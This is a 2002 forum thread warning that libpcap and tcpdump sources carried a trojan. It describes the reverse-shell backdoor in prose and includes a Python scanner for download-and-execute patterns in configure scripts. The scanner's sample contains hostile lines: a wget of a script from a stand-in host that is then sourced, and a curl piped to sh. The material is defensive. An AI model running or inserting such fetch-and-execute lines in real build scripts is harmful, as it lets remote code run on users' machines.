#1 2002-11-13 13:18:47

From: Groningen, The Netherlands
Registered: 2002-10-24
Posts: 66

ATTN: Latest libpcap & tcpdump sources contain a trojan

The URLs used in the ABS files both refer to trojaned sources. It does not seem to affect built binaries, so installing using pacman is not a problem.


    * The trojan contains modifications to the configure script and gencode.c (in libpcap only).

    * The configure script downloads which is then sourced with the shell. It contains an embedded shell script that creates a C file, and compiles it.

    * The program connects to ( on port 1963 and reads one of three one byte status codes:
          o A - program exits
          o D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to
          o M - closes connection, sleeps 3600 seconds, and then reconnects

      Hmm... ADM...

    * It's important to note that it reuses the same outgoing connection for the shell. This gets around firewalls that block incoming connections.

    * Gencode.c is modified to force libpcap to ignore packets to/from the backdoor program, hiding the backdoor program's traffic.

    * This is similar to the OpenSSH trojan a few months ago.

Check for more information
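
A heuristic check for the pattern described in the post above, a configure script that downloads something and then sources it with the shell. This is an added example, not part of the original post and not taken from the trojaned sources; the downloader names, the regexes and the sample script are assumptions constructed for illustration.

```python
import re

# Heuristics assumed for this example; tune them for your own build scripts.
FETCH = re.compile(r"\b(wget|curl|lynx|fetch)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/)?(?:ba)?sh\b")
OUTFILE = re.compile(r"(?:\s-[Oo]|>)\s*([\w./-]+)")
RUNS_FILE = r"(?:^|[;&|]|\bthen\b|\bdo\b)\s*(?:\.|source|sh|bash)\s+(?:\./)?{}\b"


def scan_configure(text):
    """Return (line_no, finding) pairs for fetch-and-execute patterns."""
    findings, downloaded = [], set()
    for no, line in enumerate(text.splitlines(), 1):
        code = line.split("#", 1)[0].strip()  # crude removal of shell comments
        if not code:
            continue
        # A file fetched on an earlier line is now being sourced or run.
        for name in sorted(downloaded):
            if re.search(RUNS_FILE.format(re.escape(name)), code):
                findings.append((no, f"executes downloaded file {name}"))
        if FETCH.search(code):
            if PIPE_TO_SHELL.search(code):
                findings.append((no, "download piped to shell"))
            else:
                findings.append((no, "network fetch in build script"))
            m = OUTFILE.search(code)
            if m:
                name = m.group(1)
                if name.startswith("./"):
                    name = name[2:]
                # Ignore stdout and device redirections such as 2>/dev/null.
                if name != "-" and not name.startswith("/dev/"):
                    downloaded.add(name)
    return findings


# Constructed sample input, not the real trojaned configure script.
SAMPLE = """#!/bin/sh
# constructed sample for the scanner
echo "checking for gcc... gcc"
wget -q -O conf_helper.sh http://build-mirror.example/helper 2>/dev/null
. ./conf_helper.sh
curl -s http://build-mirror.example/x | sh
echo "creating Makefile"
"""

if __name__ == "__main__":
    for line_no, finding in scan_configure(SAMPLE):
        print(f"configure:{line_no}: {finding}")
```

A clean result only means these patterns were not found; comparing the downloaded tarball against a digest published by the upstream project remains the stronger check.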


#2 2002-11-13 18:01:24

From: Amersfoort, the Netherlands
Registered: 2002-08-12
Posts: 362

Re: ATTN: Latest libpcap & tcpdump sources contain a trojan

Thank somebody I can't use abs at school :)
Think they would be very upset if I introduce yet another virus ...

apt-get install arch

